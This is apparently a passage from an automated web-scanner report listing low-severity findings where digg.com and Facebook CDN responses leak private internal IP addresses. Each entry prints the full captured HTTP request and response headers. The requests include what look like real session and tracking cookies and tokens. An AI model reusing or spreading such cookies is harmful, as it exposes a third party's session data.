Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Thu, 18 Aug 2011 14:57:51 GMT
X-FB-Server: 10.32.125.128
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:51 GMT
Content-Length: 2695

.PNG
.
...IHDR...0...0.....W.....
NIDATx^..Y.]e...{.g.a..^Kik[....A1A..........&>    ..1.|....1..1.......d..    ..."J....C{.3.y....@Z.@o...o..O.....o..7,.(
...w!.&.&.&.&.=w..,...H......T*.=.2(..<..@.u....
...[SNIP]...

24.8. http://digg.com/ajax/tooltip/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/tooltip/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=19213 10.2.129.145
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Content-Type: application/json
Content-Length: 759

{"event":"digg:tooltip","data":{"html":"<div class=\"tooltip \">\n <div class=\"tooltip-pointer\"><\/div>\n <a class=\"close-it tooltip-dismiss\"><span>x<\/span><\/a>\n <p class=\"tooltip-hea
...[SNIP]...

24.9. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=29908 10.2.128.186
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9012

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.128.186 Build: 241 - Mon Jul 11 14:43:10 PDT 2011">
...[SNIP]...

24.10. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQApTgvn10Rk0hhr&w=130&h=130&url=https%3A%2F%2Fi4.ytimg.com%2Fvi%2FCvYX_P_c__8%2Fdefault.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.62.181.31
X-Cnection: close
Content-Length: 3442
Vary: Accept-Encoding
Cache-Control: public, max-age=21600
Expires: Tue, 19 Jul 2011 20:57:46 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

24.11. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAiBTkQh96enSbv&w=130&h=130&url=http%3A%2F%2Fi4.ytimg.com%2Fvi%2Fcqd_4KSbnJo%2Fdefault.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.108.95
X-Cnection: close
Content-Length: 3141
Vary: Accept-Encoding
Cache-Control: public, max-age=21600
Expires: Tue, 19 Jul 2011 20:57:51 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

24.12. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBJSNWN0U24D9RS&w=130&h=130&url=http%3A%2F%2Fthumbnails.huluim.com%2F712%2F40011712%2F40011712_145x80_generated.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.43.66.69
X-Cnection: close
Content-Length: 1659
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 20 Jul 2011 14:57:46 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

24.13. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQA33UvSafIyB1_O&w=90&h=90&url=http%3A%2F%2Fgraphics8.nytimes.com%2Fimages%2F2011%2F07%2F10%2Fworld%2FMIDEAST%2FMIDEAST-thumbStandard.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.42.143.85
X-Cnection: close
Content-Length: 2818
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Wed, 20 Jul 2011 14:57:51 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

24.14. http://platform.ak.fbcdn.net/www/app_full_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /www/app_full_proxy.php?app=183319479511&v=1&size=z&cksum=326351c01bad7311632bf7ad8d8277ab&src=http%3A%2F%2Fzapp1.staticworld.net%2Fshared%2Fgraphics%2Fcms%2FyouTubeVideo_180.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.63.19.64
X-Cnection: close
Content-Length: 5428
Cache-Control: public, max-age=31535980
Expires: Wed, 18 Jul 2012 16:03:29 GMT
Date: Tue, 19 Jul 2011 16:03:49 GMT
Connection: close

......JFIF.....d.d......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

24.15. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/account/signin-widget
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "534d4ebec83c871a01ecbe77b511fc6e"
X-FB-Server: 10.27.14.124
X-Cnection: close
Content-Length: 18453
Vary: Accept-Encoding
Cache-Control: public, max-age=857
Expires: Tue, 19 Jul 2011 14:42:53 GMT
Date: Tue, 19 Jul 2011 14:28:36 GMT
Connection: close

/*1310990211,169545340,JIT Construction: v406758,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

24.16. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff535ced%26origin%3Dhttp%253A%252F%252Fwww.bing.com%252Ff312b68508%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.bing.com%2Fcommunity%2Fsite_blogs%2Fb%2Ftravel%2Farchive%2F2011%2F07%2F19%2Fputting-the-fun-in-funiculars.aspx&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=225
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=309
Expires: Tue, 19 Jul 2011 23:45:26 GMT
Date: Tue, 19 Jul 2011 23:40:17 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

24.17. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 2459
Vary: Accept-Encoding
Cache-Control: public, max-age=243
Expires: Tue, 19 Jul 2011 18:41:24 GMT
Date: Tue, 19 Jul 2011 18:37:21 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

24.18. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.138.69.186
Vary: Accept-Encoding
Content-Length: 781
Cache-Control: public, max-age=30807763
Expires: Tue, 10 Jul 2012 04:41:26 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1310359293,176833978*/

.sp_1hgi74{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/kp3yZbj02BI.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_fb3b
...[SNIP]...

24.19. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y-/r/H9wnMF3Lri6.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y-/r/H9wnMF3Lri6.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:56:16 GMT
X-FB-Server: 10.138.64.184
Content-Length: 8302
Vary: Accept-Encoding
Cache-Control: public, max-age=27434679
Expires: Fri, 01 Jun 2012 03:42:25 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1306986080,176832696*/

#badge_subheader{padding:0 10px 5px 10px}
#badge_subheader h2{color:#3b5998;display:inline;font-size: 11px}
#badges{padding:5px 10px}
.status{margin:5px;padding:10px;width:au
...[SNIP]...

24.20. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y-/r/HHkUms5lcpx.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y-/r/HHkUms5lcpx.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:24:31 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 2431
Vary: Accept-Encoding
Cache-Control: public, max-age=30423491
Expires: Thu, 05 Jul 2012 17:56:53 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1309975012,169775813*/

.fbGlossaryTip{position:relative}
.fbGlossaryTip:hover{text-decoration:none}
.fbGlossaryTip sup{padding-left:1px;font-weight:bold}
.fbGlossaryTipFixedWidth .tipTitle,.fbGloss
...[SNIP]...

24.21. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y0/r/vTlzK_6DGwe.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y0/r/vTlzK_6DGwe.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:52:12 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Content-Length: 3707
Vary: Accept-Encoding
Cache-Control: public, max-age=30813011
Expires: Tue, 10 Jul 2012 06:08:56 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1310364576,169776318*/

.invite_history .footer_sector{padding-bottom:20px}
.invite_history .header{padding:20px 20px 0;margin:0}
.invite_history .header h2{background-image:url(http://static.ak.fbc
...[SNIP]...

24.22. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y1/r/Mb-ySEi3O0b.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y1/r/Mb-ySEi3O0b.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 15 Jul 2011 21:15:31 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 6286
Vary: Accept-Encoding
Cache-Control: public, max-age=31215284
Expires: Sat, 14 Jul 2012 21:53:27 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1310766837,169776065*/

.og .fbChatTabMax{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/fWNizIMkOmm.png);background-repeat:no-repeat;background-position:0 0;display:inline-block;h
...[SNIP]...

24.23. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y1/r/r0jm6f8JtY2.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y1/r/r0jm6f8JtY2.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 23 May 2011 17:45:40 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 10170
Vary: Accept-Encoding
Cache-Control: public, max-age=26656152
Expires: Wed, 23 May 2012 03:27:53 GMT
Date: Tue, 19 Jul 2011 14:58:41 GMT
Connection: close

/*1306207642,169775813*/

.interaction_form .recipients{font-size: 11px;padding:5px 10px 2px;color:#808080}
.interaction_form .recipients strong{float:left;padding:4px}
.interaction_form .recipients .
...[SNIP]...

24.24. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y1/r/rrdmptIcoxd.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y1/r/rrdmptIcoxd.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:50:45 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 5955
Vary: Accept-Encoding
Cache-Control: public, max-age=30810636
Expires: Tue, 10 Jul 2012 05:28:30 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1310362104,169775812*/

.sp_59znm7{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/6DyuwYMrMc0.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_4efb
...[SNIP]...

24.25. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/PSpx_i42gvE.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y2/r/PSpx_i42gvE.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y2/r/PSpx_i42gvE.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 27 Jun 2011 02:23:57 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 14960
Vary: Accept-Encoding
Cache-Control: public, max-age=29719672
Expires: Wed, 27 Jun 2012 14:25:41 GMT
Date: Tue, 19 Jul 2011 14:57:49 GMT
Connection: close

/*1309270985,169775811*/

html body{background:#f2f2f2}
.devsitePage{font-family:"Lucida Grande", Tahoma, Verdana, Arial, sans-serif;font-size: 11px;color:#333;margin:0;min-width:1024px;font-size: 11p
...[SNIP]...

